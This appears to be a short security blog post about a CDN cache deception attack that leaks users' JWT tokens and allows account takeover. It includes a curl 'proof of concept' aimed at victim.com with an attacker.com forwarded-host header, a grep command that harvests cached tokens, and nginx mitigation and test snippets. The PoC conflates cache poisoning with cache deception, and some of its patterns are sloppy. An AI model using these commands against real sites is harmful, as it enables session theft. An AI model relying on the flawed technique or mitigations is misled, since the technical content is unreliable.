One-Click Account Takeover via Cache Deception Attack

Listen to this Post

Featured Image
Cache Deception occurs when an attacker tricks a CDN or caching layer into caching dynamic, user-specific content under a URL that appears to serve static resources. If the application fails to enforce proper cache controls, sensitive data (such as JWT tokens) can be stored and later served to anyone accessing the same manipulated URL.

In the reported case, despite the server responding with a 404 Not Found, the victim’s JWT token remained in the response—and the CDN cached it. Attackers could then retrieve the token by accessing the same crafted URL, leading to full account takeover.

You Should Know:

How Cache Deception Works

  1. Identify Cacheable Endpoints – Attackers target URLs that appear static (e.g., /profile.css, /settings.json).
  2. Force Cache Storage – Even if the response is a 404, if the CDN caches it, sensitive data may persist.
  3. Retrieve Cached Data – Any user requesting the same URL receives the cached response, exposing tokens or session data.

Exploit Code (Proof of Concept)

curl -i "https://victim.com/profile.css" -H "X-Forwarded-Host: attacker.com"

– If the CDN caches the response, check for leaked tokens:

curl -s "https://victim.com/profile.css" | grep -Eo "eyJ[a-zA-Z0-9_-]+.[a-zA-Z0-9_-]+.[a-zA-Z0-9_-]+"

Mitigation Techniques

  • Disable Caching for Sensitive Endpoints
    location ~ (.css|.json)$ {
    add_header Cache-Control "no-store, no-cache";
    proxy_cache_bypass 1;
    }
    
  • Validate Cache Keys – Ensure CDNs differentiate between authenticated and unauthenticated requests.
  • Use `Vary: Authorization` Header – Prevents caching of user-specific responses.

Testing for Cache Issues

1. Check Headers

curl -I "https://target.com/account" | grep -i "cache-control"

2. Verify Caching Behavior

for i in {1..5}; do curl -s "https://target.com/profile.css" -H "Cookie: session=123" | wc -l; done

– If responses are identical, caching may be misconfigured.

What Undercode Say

Cache deception remains a critical threat in web security, particularly when applications rely on CDNs without strict cache policies. Developers must:
– Audit cache configurations for dynamic endpoints.
– Implement strict `Cache-Control` headers.
– Monitor CDN logs for unusual caching patterns.

Expected Output:

HTTP/1.1 404 Not Found 
Cache-Control: public, max-age=3600 
... 
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c 

Prediction:

As CDN adoption grows, cache-based attacks will increase, requiring stricter default security policies from cloud providers.

URLs for further reading:

References:

Reported By: Mohamed Kamal – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram